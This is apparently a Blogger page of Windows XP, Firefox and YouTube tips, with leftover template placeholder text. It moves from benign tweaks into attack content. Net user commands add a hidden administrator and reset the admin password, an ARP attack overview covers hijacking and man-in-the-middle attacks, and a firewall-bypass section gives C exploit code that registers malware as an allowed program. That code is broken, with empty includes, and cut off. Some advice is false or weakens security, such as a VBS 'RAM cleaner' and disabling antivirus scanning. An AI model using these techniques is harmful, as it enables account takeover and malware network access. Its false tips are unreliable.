This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Remove Unwanted Hidden Programs


If you want to remove programs that are installed with Windows but are not visible in "Add/Remove Windows Components" (such as MSN Messenger in WinXP), edit a file called "C:\WINDOWS\INF\SYSOC.INF".
Go to: Start>> Run>> type in: C:\WINDOWS\INF\SYSOC.INF [Enter]

In there you will find a listing of programs, and you will note that some programs have the word 'hide' at the end. Simply remove the word 'hide' but leave the preceding comma. Examples:

BEFORE:msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

AFTER:msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

Exit saving changes.

Now when you open Add/Remove Windows Components, you will see the now viewable, in this example, "Windows Messenger".

Select theme and color scheme for welcome screen


With this tweaks you will be able to modify which color selection of the default theme is shown when the computer start up screen is displayed. Currently since there is only one theme you can only change the color scheme for the theme but in the future when more themes are available for XP you will be able to change which theme is used in the same place in the windows registry.
1. Start regedit, if you are unfamiliar with regedit please see our FAQ.

2. Navigate to HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager

3. Locate the key ColorName

4. Right Click on it and select modify.

5. Change where it says "NormalColor" to "Metallic"

6. Click Ok, and exit regedit

7. Restart

Note: To go back to the old color scheme durring startup just change "Metallic" back to "NormalColor" Once more themes are released you will be able to modify the DllName key to select different themes.

Sixteen Simple Tips


1.Switch to welcome screen
Press Win+L to switch to the Welcome screen.

2.Lock your workstation

Press Win+L to lock your workstation.

3.Switch user easly

You can switch users without going through the Welcome screen: From Task Manager, go to the Users tab, right-click a user, and select Connect.

4.Hibrernate computer

Hold down the shift key in the shutdown dialog to change "Stand By" to "Hibernate". Or just press H to hibernate instantly. You can even use the Power Control Panel to configure your power button to hibernate.

5.Disable password when resuming stanby

To disable the password when resuming from standby or hibernation, open the Power Control Panel and uncheck "Prompt for password after returning from standby" on the Advanced tab.

6.Choose details

From the View Menu, select "Choose Details" to select which file properties should be shown in the Explorer window. To sort by a file property, check its name in the "Choose Details" in order to make that property available in the "Arrange Icons by" menu.

7.Display volume control icon in taskbar

To display the volume control icon in the taskbar, go to the Sounds and Audio Devices Control Panel and select "Place volume icon in the taskbar".

8.Delete file without send into recycle bin

Hold down the shift key when deleting a file to delete it immediately instead of placing it in the Recycle Bin. Files deleted in this way cannot be restored.

9.Customize 'send to' menu

Put a shortcut to your favorite editor in your Send To folder and it will appear in your "Send To" menu. You can then right-click any file and send it to your editor.

10.Organize favorites

a) To organize your Favorites in Explorer instead of using the Organize Favorites dialog, hold the shift key while selecting "Organize Favorites" from the Favorites menu of an Explorer window.

b) You can organize your Favorites by dragging the items around your Favorites menu.
Alternatively, you can open the Favorites pane and hold the Alt key while pressing the up and down arrows to change the order of your Favorites.

11.View IE in fullscreen

To run Internet Explorer fullscreen, press F11. Do it again to return to normal mode.

12.Hide printers & faxes

If your "Printers and Faxes" folder is empty, you can hide the "Printers and Faxes" icon when viewed from other computers
by stopping the Print Spooler service.

13.Add/remove columns from detail mode

To add or remove columns from Details mode, select Choose Details from the View menu, or just right-click the column header bar.

14.Go backwards or forward by mouse wheel

In Internet Explorer, hold the Shift key while turning the mouse wheel to go forwards or backwards.

15.Add current page to favorites

In Internet Explorer, type Ctrl+D to add the current page to your Favorites.
This and many more keyboard shortcuts can be found by going to Internet Explorer, clicking the Help menu, then selecting Contents and Index. From the table of contents, open Accessibility and click "Using Internet Explorer keyboard shortcuts".

16.Shut down via Remote Desktop

To shut down via Remote Desktop
, click the Start button, then type Alt+F4.

Solve Hidden files does not appear After effected by virus


First Stopping the virus: u need to check the task manager to see if there is a (SVCHOST.EXE) running under the current logged in username and try to terminate it.
Note: After u terminate the virus try not to double click on any of you computer driver coz this....

action will start the virus allover again, when u need to access any of ur drivers (Hard Disk Partition), type it's drive letter in the address bar and it will open without starting
the virus process.

Second Fixing the show hidden files and folders: ________________________________________

Then u need to open "Registry Editor" and then go to

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"

And delete the Existing "CheckedValue" of the type "String" and create another one of the same name but of the type "DWORD" and set it's value to "1" Then open "My Computer" and

go to: Tools> Folder Options> View> and select "Show hidden files and folders" and Uncheck "Hide protected operating system files"

Third Deleting the virus: ________________________________________

The easiest part, all u have to do is to delete the following files from your computer ( don't
forget how u should open the drivers or u will have to do it from the start )

1. C:\windwos\SVCHOST.EXE

2. C:\windwos\SVCHOST.inf or ini (probably they will be together side by side)

3. C:\RAVMON.EXE 4.C:\Autorun.inf

Then check the rest of the hard drivers you have on your computer ( D, E, or whatever) for
the files Number (3 and 4)

Restart your computer

Speed up Menu Display


Click Start. Right-click My Computer, and then click Properties
Click the Advanced tab. In the Performance area, click Settings

On the Visual Effects tab in the Performance Options dialog box, clear the Fade or slide menus into view check box

Click OK.

In the System Properties dialog box, click OK.Now when you click a menu, it will appear almost instantly.

Speed up the Start Menu


The default speed of the Start Menu is pretty slow, but you can fix that by editing a Registry Key.
Fire up the Registry Editor and navigate to the following key:

HKEY_CURRENT_USER \ Control Panel \ Desktop \ MenuShowDelay

By default, the value is 400. Change this to a smaller value, such as 0, to speed it up.

If this doesn't work for some reason, then you might try the following:

Navigate to
Display Properties then Appearance then Effects and turn off the option titled Show menu shadow. You will get much better overall performance.

Ten tips to increase your Windows Security


1- Always protect your Administrator account by creating password, just go to Control Panel > User Accounts, select your account and the click on "create a password for your account".
2- Protect your account by Password protect your screen saver, go to Control Panel > Display, Click on the Screen Saver tab and then check on resume password protect.

3- Setup a BIOS Password to protect your PC Setup application.

4- Always force you windows automatic update on, go to Control Panel > Automatic Updates and then Select the first option to have each update download and install automatically.

5- Install an Internet Security Suite such as "Kaspersky Internet Security", "Norton Internet Security" or "Mcafee Internet Security". And turn on software automatic update.

6-
If you don’t have enough budgets to buy an Internet Security Suite, Turn on the Windows Firewall. Go to > Control Panel > Windows Firewall and click on under the General tab. And Install an antivirus program, turn on automatic updates, and set up a regular scanning schedule.

7- Never use same username and/or password for all of your accounts in Internet.

8-
Turn off file sharing in Windows Explorer. Open Explorer, click Tools > Folder Options >View. Then Scroll to the bottom, uncheck Use simple file sharing, and click Apply.

9- Increase your Internet Explorer security settings. Click Tools > Internet Options> Privacy and move the slider to High.

10- Turn on your Internet Explorer’s pop-up blocker. Click Tools > Internet Options > Popup Blocker Settings > and then choose default.

Turn off the Low Disk Space Notification

Open Registry
by going to START-RUN and entering REGEDIT

and Navigate to

HKEY_CURRENT_USER and in
Software – Microsoft – Windows – CurrentVersion – Policies - Explorer,

and set the value of NoLowDiskSpaceChecks to DWORD = 1.

(This modification requires a logoff or reboot to work)

Want to Improve Shutdown Time


Close apps automatically & quickly at shutdown

Open Registry by going to START-RUN and typing REGEDIT.

Navigate to

HKEY_CURRENT_USER\CONTROL PANEL\DESKTOP

and look for AutoEndTasks.
On my computer default value is 0. Change it to 1.

Thats all.

Further more you can reduce the time it takes for Windows to issue kill directive to all active/hung applications. In doing this only constraint that you should make sure exists is that HungAppTimeout is greater than WaitToKillAppTimeout. Change the values of WaitToKillAppTimeout to say 3500
(since default value for HungAppTimeout 5000 and for
WaitToKillAppTimeout is 20000)

Windows Utilities Shortcuts


Here are some popular shortcuts to handy Windows utilities:
Simply type the shortcut command in to the Run textbox (Start>> Run), then click OK.

Shortcut Utility

compmgmt.msc Computer Management

devmgmt.msc Device Manager

dfrg.msc Disk Defragmenter

diskmgmt.msc Disk Management

eventvwr.msc Event Viewer

fsmgmt.msc Shared Folders Manager

gpedit.msc Group Policies Editor

lusrmgr.msc Local Users and Groups Manager

perfmon.msc Performance Monitor

secpol.msc Local Security Settings

services.msc Services

You Cannot Create a Folder Named CON !!


It is fact that you cannot create a folder named "CON", nor can you rename an existing folder to "CON". "CON" and a number of other character strings are in fact reserved names that go back to the days of DOS and cannot be used to name folders or files.
Other
reserved names are:

* PRN

* AUX

* NUL

* LPT1

* COM1

* Potential drive letter - A: to Z:

* A number of others


If you try to name a folder using one of these reserved names, the name will automatically revert to the default, generally "New Folder". Moreover, if you try to use a reserved name to name a file such as a Notepad or Microsoft Word document you will generally receive an error message similar to the following:




Depending on exactly how you save the file, you may instead receive a warning message advising that a file with that name already exists. However, even if you choose "Yes" to overwrite the existing file, you will still not be allowed to save the file.

Useful Direct Links


Kaspersky
http://dnl-eu10.kaspersky-labs.com/devbuilds/



Bitdefender

http://download.bitdefender.com/windows/

http://download.bitdefender.com/updates/

http://download.bitdefender.com/SMB/



AVG

http://download.grisoft.cz/softw/80free/update/



Symantec Ebooks & Guide

ftp://ftp.symantec.com/public/english_us_canada/products/



Mozilla Firefox

http://releases.mozilla.org/pub/mozilla.org/firefox/releases/


Opera

ftp://mirror-fpt-telecom.fpt.net/mirror/opera/win/



HP Drivers

ftp://ftp.hp.com/pub/softlib/software1
ftp://ftp.hp.com/pub/softlib/software2
ftp://ftp.hp.com/pub/softlib/software3
...10



IBM Drivers & Tools

ftp://ftp.software.ibm.com/pc/



All Drivers

ftp://202.65.194.211/pc/



Windows Tools

http://ftp.unb.br/pub/

Firefox Tricks & Tweaks

The about:config page contains most (if not, all) of Firefox configuration options. It is so far the most effective, and the most powerful way to tweak and enhance your Firefox performance.
Here are some of the popular tweaks.
Accessing your about:config page

In your Firefox, type about:config in the address bar.

You will be shown a warning page. Click the “I’ll be careful, I promise!” button to proceed.

On the main page, you will see a long list of configuration entries. Enter the name of the key you want to update in the “Filter” field. The list will narrow to only the entries that match your keyword as you type.


To modify the value, simply double click on the entry value field and update the entry. That’s all!

Isn’t that simple? Now, let’s get to the tweaking.


1) Adjust the Smart Location Bar’s Number of Suggestions

In Firefox 3, when you start typing in the location bar, a drop-down list of suggestion URLs will be shown. If you want it to show more than 12 suggestions (12 is the default), you can adjust the browser.urlbar.maxRichResults keys and get it to show the number you want.

Config name: browser.urlbar.maxRichResults
Default: 12
Modified value: Set to your desired number of suggestion. If you want to disable it all together, set it to -1


2) Disable the session restore function

Firefox 3 automatically saves your session every 10 secs so that whenever it crashes, it can restore all your tabs. While this is a useful feature, some of you might find it irritating. To disable this function, toggle the value of browser.sessionstore.enabled to False

Config name: browser.sessionstore.enabled
Default: True
Modified value: False if you want to disable the session restore function


3) Adjust the Session Restore Saving Frequency

Same as above, if you decided to keep the session restore feature on, but want to reduce the session saving frequency, change the value of browser.sessionstore.interval so that Firefox will save the session at a longer interval.

Config name: browser.sessionstore.interval
Default: 10000 (in msecs, equivalent to 10secs)
Modified value: Set it to your desired value. 1000 means 1 sec and 60000 means 1 minute.


4) Enable Advanced Color Profile Support

Firefox has this advanced color profile features that display higher image quality. It is not enabled by default as it has a negative effect on the performance of the browser. If you are concern with the image quality rather than the performance, you can activated it via the gfx.color_management.enabled setting

Config name: gfx.color_management.enabled
Default: False
Modified value: True (if you want to activate the color profile support feature)


5) Disable Antivirus Scanning

This is mainly for Windows users. By default, Firefox 3 automatically scan the downloaded file with the default anti-virus application to make sure it is free of virus. If you download a big file, it could take a long time for the whole scanning process to complete. To increase the performance of the browser, you might want to consider disabling the anti-virus scanning via the browser.download.manager.scanWhenDone key.

Config name: browser.download.manager.scanWhenDone
Default: True
Modified value: False (if you want to disable it)


6) Configuring The Scrolling Tabs

When you opened many tabs, Firefox will not keep on reducing the tab width. Instead, it shows a scrolling bar so that the min width (100px) is conserved and you can scroll to find your tabs. If you are those who don’t like the scrolling tab function and prefer Firefox to show all the tabs, regardless how small it is, you can set the value of browser.tabs.tabMinWidth to 0 to disable it. Similarly, if you want Firefox to display more tabs before showing the scrolling button, you can reduce the default value to a lower value, say 75 pixels.

Config name: browser.tabs.tabMinWidth
Default: 100
Modified value: 0 if you want to disable the scrolling functions, other values to set the min width value


7) Show/Disable Close button on Tabs

Some people love to see the Close (the red X) button on every tabs, but some hate it. Whatever is it, you can configure it to your preferences via the browser.tabs.closeButtons setting.

Config name: browser.tabs.closeButtons
Default: 1
Modified values:

* 0 – display a close button on the active tab only
* 1- display close buttons on all tabs
* 2- don’t display any close buttons
* 3- display a single close button at the end of the tab strip


8) Extend Scripts Execution Time

In Firefox 3, a script is only given 10 seconds to respond, after which it will issue a unresponsive script warning. If you are hooked on a slow network connection, you might want to increase the script execution time via dom.max_script_run_time to cut down on the frequency of the no script warning.

Config name: dom.max_script_run_time
Default:10 (in secs)
Modified value: 20, or any values greater than 10


9) Handling javascript Popups

When you come across a site that executes a javascript open new window function, and if the popup window is without all the usual window features, i.e. back/forward/reload buttons, status bar etc, Firefox will automatically treat it as a popup and will not open it as a new tab. However, if you find this to be a nuisance and wanted to open all new windows in a new tabs, you can specify it via the browser.link.open_newwindow.restriction setting.

Config name: browser.link.open_newwindow.restriction
Default: 2 – Open all javascript windows the same way as you have Firefox handle new windows unless the javascript call specifies how to display the window
Modified values:

* 0 – open all links as how you have Firefox handle new windows
* 1 – do not open any new windows
* 2- open all links as how you have Firefox handle new windows unless the javascript specify how to display the window


10) Enable Spell Checking In All Text Fields

The default spell checking function only checks for multi-line text boxes. You can get it to spell-check for single line text box as well.

Config name: layout.spellcheckDefault
Default: 1 (spell checker for multi-lines text boxes only)
Modified values:

* 0 – disable the spell checker
* 2 – enable the spell checker for all text boxes


11) Open Search Box Results In New Tab

When you search using the search box at the top right hand corner of the browser, it will display the search results in the current tab. If you don’t want the search to interfere with your current tab, you can tweak the browser.search.openintab to make it open in a new tab.

Config Name: browser.search.openintab
Default: False
Modified value: True (open search box results in new tab)


12) Lower The Physical Memory Used When Minimized

This tweak is mainly for Windows users. When you minimize Firefox, it will send Firefox to your virtual memory and free up your physical memory for other programs to use. Firefox will reduce its physical memory usage, when minimized, to approximately 10MB (give or take some) and when you maximize Firefox it will take back the memory that it needs.

The preference name does not exist and needs to be created.

Right click on the background and select New->Boolean.

Enter the name when prompted: config.trim_on_minimize
Enter the values: True


13) Speed up your Firefox

Several tweaks required for this

Config name: network.http.pipelining
Default: False
Modified value: True

Config name: network.http.proxy.pipelining
Default: False
Modified value: True

Config name: network.http.pipelining.maxrequests
Default: 4
Modified value: any value higher than 4, but not more than 8

Config name: network.http.max-connections
Default: 30
Modified value: 96

Config name: network.http.max-connections-per-server
Default: 15
Modified value: 32


14) Increase/Decrease the Amount of Disk Cache

When a page is loaded, Firefox will cache it into the hard disk so that it doesn’t need to be download again for redisplaying. The bigger the storage size you cater for Firefox, the more pages it can cache.

Before you increase the disk cache size, make sure that browser.cache.disk.enabled browser.cache.disk.enable is set to True.

Config name: browser.cache.disk.capacity
Default: 50000 (in KB)
Modified value:

* 0 – disable disk caching
* any value lower than 50000 reduces the disk cache
* any value higher than 50000 increases the disk cache.


15) Select all text when click on the URL bar

In Windows and Mac, Firefox highlights all text when you click on the URL bar. In Linux, it does not select all the text. Instead, it places the cursor at the insertion point. Regardless which platform you are using, you can now tweak it to either select all or place cursor at insertion point.

Config name: browser.urlbar.clickSelectsAll
Modified value:

* False – place cursor at insertion point
* True – select all text on click


16) Autofill Address in URL Bar

Other than the smart location feature, you can also get your URL bar to autofill the address as you type the URL.

Config name: browser.urlbar.autofill
Default: False
Modified value: True (Have Firefox autofill the address as you type in the URL bar)


17) Same Zoom Level For Every Site

Firefox remembers your zoom preference for each site and set it to your preferences whenever you load the page. If you want the zoom level to be consistent from site to site, you can toggle the value of browser.zoom.siteSpecific from True to False.

Config name: browser.zoom.siteSpecific
Default: True
Modified value: False (enable same zoom preferences for every sites)


18) Setting your zoom limit

If you find that the max/min zoom level is still not sufficient for your viewing, you can change the zoom limit to suit your viewing habits.

Config name: zoom.maxPercent
Default: 300 (percent)
Modified value: any value higher than 300

Config name: zoom.minPercent
Default: 30 (percent)
value: any value


19) Configure Your Backspace Button

In Firefox, you can set your backspace to better use by getting it to either go back to the previous page or act as page up function.

Config name: browser.backspace_action
Default: 2 (does nothing)
Modified value:

* 0 – go back previous page
* 1- page up


20) Increase Offline Cache

If you do not have access to Internet most of the time, you might want to increase the offline cache so that you can continue to work offline. By default, Firefox 3 caches 500MB of data from supported offline Web apps. You can change that value to whatever amount of your choice.

Config name: browser.cache.offline.capacity
Default: 512000 (in KB)
Modified value: any value higher than 512000 will increase the cache value


21) Auto Export Firefox 3 bookmarks to bookmarks.html

Unlike the previous version, Firefox 3 backup the bookmarks file in places.sqlite rather than the usual bookmarks.html. Since bookmarks.html allows us to export and sync our bookmarks with other browser, it will be very useful if Firefox 3 can backup the bookmark to the bookmarks.html as well.

Config name: browser.bookmarks.autoExportHTML
Default: False
Modified value: True (auto export bookmarks file to bookmarks.html)


22) Disable Extension Compatibility Checks

This is useful if you want to use an extension that is not supported by your version of Firefox badly. It is not recommended, but you can still do it at your own risk.

Right click and select New->Boolean. Enter extensions.checkCompatibility in the field. Enter False in the next field.

Right click again and select New->Boolean. Enter extensions.checkUpdateSecurity into the field and enter False into the next field.


23) Disable Delay Time When Installing Add-on

Everytime you wanted to install a Firefox add-on, you will have to wait for several secs before the actual installation starts. If you are tired of waiting, you can turn the function security.dialog_enable_delay off so that the installation will start immediately upon clicking.

Config name: security.dialog_enable_delay
Default: 2000 (in msec)
Modified value:

* 0 – start installation immediately
* any other value (in msec)


24) View Source in Your Favorite Editor

This is very useful for developers who are always using the ‘view source‘ function. This tweak allows you to view the source code in an external editor.

There are two configuration need to be made:
Config name: view_source.editor.external
Default: False
Modified value: True ( enable view source using external text editor)

Config name: view_source.editor.path
Default: blank
Modified value: insert the file path to your editor here.


25) Increasing ‘Save Link As‘ timeout value

When you right click and select the ‘Save Link As…‘, the browser will request the content disposition header from the URL so as to determine the filename. If the URL did not deliver the header within 1 sec, Firefox will issue a timeout value. This could happen very frequently in a slow network connection environment. To prevent this issue from happening frequently, you can increase the timeout value so as to reduce the possibility of a timeout.

Config name: Browser.download.saveLinkAsFilenameTimeout
Default: 1000 (1 sec)
Modified value: any value higher than 1000 (value is in msec)


26) Animate Fullscreen Toolbar Collapse mode

In Firefox’s fullscreen mode, toolbars and the tab strip are hidden at the top of the screen and only shown on mouseover. To draw attention to this, there is an animation of the toolbar sliding upwards and off-screen when fullscreen mode is toggled on. For performance issue, the animation of the collapse of the toolbar only appear for the first time. For some reason that you may love/hate the animation, you can adjust Browser.fullscreen.animateUp to switch it on/off for every collapse.

Config name: Browser.fullscreen.animateUp
Default: 1 (animate the toolbar collapse only the first time)
Modified value:

* 0 -disable the animation
* 2- enable the animation for every collapse


27) Autohide Toolbar in Fullscreen mode

In fullscreen mode, the toolbar is set to autohide and appear upon mouseover. If you have a need to view the toolbar at all time, you can toggle the value of browser.fullscreen.autohide to False to always show the toolbar.

Config name: browser.fullscreen.autohide
Default: True (always autohide)
Modified value: False (always show the toolbar)


28) Increase Add-On search result

If you go to Tools->Add-ons->Get Add-ons and perform a search there, Firefox will only fetch and display 5 matching results. If you want Firefox to show more than 5 results (say 10), you can adjust extensions.getAddons.maxResults to get it to display more results.

Config name: extensions.getAddons.maxResults
Default: 5
Modified value: any value more than 5

This list of about:config is definitely not the complete list. If you have any tricks not listed here, please add it in the comment.

Many of above about:config hacks are available in Older Firefox Version, at the end if some thing goes wrong then feel free to restore your about:config to older setting see the below image of how to restore about:config

Below are some Cool Firefox Tricks, just copy and paste it in your firefox browser's address bar :

chrome://browser/content/browser.xul
- Opens another Firefox inside a tab in the the existing Firefox window

chrome://browser/content/preferences/preferences.xul
- Opens Options dialog box inside the tab

chrome://browser/content/bookmarks/bookmarksPanel.xul :
- Opens BookMarks Manager inside the tab

chrome://browser/content/history/history-panel.xul
- Opens History Panel inside the tab.

chrome://mozapps/content/extensions/extensions.xul?type=extensions
- Opens Extensions window in the current tab

chrome://browser/content/preferences/cookies.xul
- Opens cookies window inside the tab

chrome://browser/content/preferences/sanitize.xul
- Opens Clear Private Data window inside the current tab

chrome://browser/content/aboutDialog.xul
- Opens About Firefox Dialog box inside the tab

chrome://global/content/alerts/alert.xul
- Dancing Firefox

Hack Youtube To Watch the Best Quality Videos


Whenever you connect to my youtube channel (http://www.youtube.com/),
if you see some videos can not watch with high quality, you can use this TIPS ...


Step1: Click to video that you want to see, the link will display on Address bar. E.x: http://www.youtube.com/user/wildminer?blend=6&ob=4

Step2: Add &fmt=6 to the end of that string. That address like:
http://www.youtube.com/user/wildminer?blend=6&ob=4&fmt=6

Enjoy it ! The higher quality video !!!

Step3: Add &fmt=18 to the end of that string, you'll have the best quality video with direct download link !
http://www.youtube.com/user/wildminer?blend=6&ob=4&fmt=18

Note: Appending &fmt=6 to the URL delivers a 448x336 resolution version of the video and appending &fmt=18 delivers a even better 480x360 resolution version.

Be Careful Before You ‘Like’ This on Facebook

Warning: If you receive news feed carrying any of the following links ‘Liked’ by any of your Facebook friends, don’t click on the link to check it out. It’s a clickjacking worm attack spreading through the ‘Like’ option and has affected hundreds of thousands of users.
These messages include: “LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE,” “This man takes a picture of himself EVERYDAY for 8 YEARS!!,” “The Prom Dress That Got This Girl Suspended From School” and “This Girl Has An Interesting Way Of Eating A Banana .Check It Out!”

Clicking on any of these links takes you to a blank page saying “Click here to continue”. Clicking on this page then publishes the same message to your profile and news feed. The worm doesn’t harm in any other way but you’d rather be not carrying it in your account.

Security firm Sophos has identified the linked pages as being infected with the Troj/iframe-ET worm and has recommended deleting any such entries showing up in your news feed and also making sure no such WebPages have been linked to your Profile.

Speed up your PC


You may recognize that your system gets slower and slower when playing and working a lot with your pc. That's cause your RAM is full of remaining progress pieces you do not need any more.

So create a new text file on your desktop and call it ..
"RAMcleaner" or something...

Type

“FreeMem=Space(64000000)”
in this file and save it as “RAMcleaner.vbs” [ You may choose the "All Files" option when you save it ]

Run the file and your RAM will be cleaned,
Of course you can edit the code in the file for a greater "cleaning-progress".

FreeMem=Space(128000000)

Just try it out..

Hack Admin Password From User Mode

Hack Admin Password From User Mode
Disclaimer: Use this article for eductational purpose ONLY.

Follow these steps:
1. Open command prompt (Start->Run->cmd),

2. Enter the following command, then press ENTER

3. Enter the followin command, then press ENTER:
compmgmt.msc
This should open the computer management console.

4. Go to local users & groups->users. Right click on any user and select "set password".

If you get a "access denied" do the following:

start>run>cmd
then use following commands
1) net user test /add (this command will make test named user)
2) net localgroup administrators test /add (this command will make test user as administrators rights)

and use net user command to reset your admin. password



Alternative



What if u don't know the password of your admin and still want to hack and change .. yea u can do it ..in a very easy manner.. check this. just follow the steps.. this doesn't require u to know the admin password but still u can change it..
Start >> Run >> [type]cmd // this will open your command prompt
[type] net(space)user(press enter)
[type] net(space)user(space)[windowsloginid](sp ace)*(press enter)

// for e.g. : net user HOME *(press enter)

[type] new password (press enter) and retype it (press enter).. it will show u confirmation... // caution it wont show u the password u type.. but it still types.. the blinking pointer will b there at the same place.. but it still works..
// for e.g. : password changed successfully.

How To Create A Hidden User Account

This tweak allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in Windows 2000.
#[Start] [Run] [Regedit]

#Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList

#Modify/Create the Value Data Type(s) and Value Name(s) as detailed below
.
#Data Type: REG_DWORD [Dword Value] // Value Name: Type Name of Account to be Hidden

#Setting for Value data: [0 = Account is Hidden / 1 = Enabled]

#Exit Registry and Reboot...

While the account is hidden on the Welcome screen, note that the account profile will be visible in C:\Documents and Settings or wherever user profiles are stored as well as in Local Users and Groups.

How to lock your computer

Creating a desktop shortcut for locking your computerIf you use your computer in an area where others may have access to it, and there are things on your system you would rather have kept confidential, locking your desktop when you leave the computer is an essential task. Here's a recipe for a desktop shortcut that will lock your computer in two easy clicks:

Right click on an empty area of the desktop and choose 'new' then 'shortcut.' The create shortcut wizard will open; in the first text box, type '%windir%\System32\rundll32.exe user32.dll,LockWorkStation' and then give your shortcut an appropriate name on the next page, and hit 'finish.'

You will notice that the shortcut you created has a blank icon. To select a more appropriate one, right click on the shortcut and hit 'properties.' In the 'shortcut' tab, click the 'change icon' button.

In the 'look for icons in this file' box, type '%SystemRoot%\system32\SHELL32.dll' then click 'ok' to see a range of icons for your new shortcut. Choose an appropriate icon. Your desktop locking shortcut is now ready for use. Test it out.


Note: It is useful if u have an account as it will prompt for a password.

OR

Hide all drives in my computer
Wanna how your geekiness. Here's the registry hack to hide all the drives in my computer.

head up to
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
create a new DWORD value as NoDrives and modify its data to 03FFFFFF(six F's)

reboot and you are done.

To change back.
delete the key or modify the data to 0. (zero)

Address Resolution Protocol (ARP) Attacks

-: Address Resolution Protocol (ARP) Attacks :-
What Does ARP Mean?
Address Resolution Protocol (ARP) is a stateless protocol, was designed to map Internet Protocol addresses (IP) to their associated Media Access Control (MAC) addresses. This being said, by mapping a 32 bit IP address to an associated 48 bit MAC address via attached Ethernet devices, a communication between local nodes can be made.

On a majority of operating systems, such as Linux, FreeBSD, and other UNIX based operating systems, and even including Windows, the "arp" program is present. This program can be used to display and/or modify ARP cache entries.

An example of the "arp" utility's output would look like the following:

Windows:
> arp -a
Interface: 192.168.1.100 .- 0x10003
Internet Address Physical Address Type
192.168.1.1 00-13-10-23-9a-53 dynamic

Linux:
$ arp -na
? (192.168.1.1) at 00:90:B1:DC:F8:C0 [ether] on eth0

FreeBSD:
$ arp -na
? (192.168.1.1) at 00:00:0c:3e:4d:49 on bge0


How ARP works?
Specifically for Internet Protocol Version 4 (IPv4), ARP maps IP addresses between the Network layer and Data Link layer of the Open System Interconnection (OSI) model.
For a more complete and thorough explanation of how address resolution works, and protocol specifics, please consult RFC 826.


ARP Protocol Flaws :-
ARP's main flaw is in its cache. Knowing that it is possible for ARP to update existing entries as well as add to the cache, this leads one to believe that forged replies can be made, which result in ARP cache poisoning attacks.


Terms & Definitions :-
ARP Cache Poisoning : Broadcasting forged ARP replies on a local network. In a sense, "fooling" nodes on the network. This can be done because ARP lacks authentication features, thus blindly accepting any request and reply that is received or sent.

MAC Address Flooding : An ARP cache poisoning attack that is mainly used in switched environments. By flooding a switch with fake MAC addresses, a switch is overloaded. Because of this, it broadcasts all network traffic to every connected node. This outcome is referred to as "broadcast mode" because, all traffic passing through the switch is broadcasted out like a Hub would do. This then can result in sniffing all network traffic.


The ARP Attacks :-
1] Connection Hijacking & Interception : Packet or connection hijacking and interception is the act in which any connected client can be victimized into getting their connection manipulated in a way that it is possible to take complete control over.

2] Connection Resetting : The name explains itself very well. When we are resetting a client's connection, we are cutting their connection to the system. This can be easily done using specially crafted code to do so. Luckily, we have wonderful software that was made to aid us in doing so.

3] Man In The Middle : One of the more prominent ways of attacking another user in order to hijack their traffic, is by means of a Man In The Middle (MITM) attack. Unlike the other attacks, a MITM is more a packet manipulation attack which in the end however does result in packet redirection to the attacker . all traffic will get sent to the attacker doing the MITM attack. This attack however is specific. As opposed to MAC Address Flooding or other attacks against a router/switch, the MITM attack is against a victim, and also can be done outside of a switched environment. Thus meaning, an attack can be executed against a person on the other side of the country.

4] Packet Sniffing : Sniffing on a Local Area Network (LAN) is quite easy if the network is segmented via a hub, rather than a switch. It is of course possible to sniff on a switched environment by performing a MAC flood attack. As a result of the MAC flood, the switch will act as a hub, and allow the entire network to be sniffed. This gives you a chance to use any sort of sniffing software available to you to use against the network, and gather packets.

5] Denial of Service : MAC Address Flooding can be considered a Denial of service attack. The main idea of the MAC flood, is to generate enough packet data to send toward a switch, attempting to make it panic. This will cause the switch to drop into broadcast mode and broadcast all packet data. This however did not result in a crash, or the service to be dropped, but to be overloaded.

Bypassing Windows-XP Firewall

There is a technique using which we can bypass windows-xp service pack-2 firewall.This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.
If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Exploit :-
#include
#include
#include
#include
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
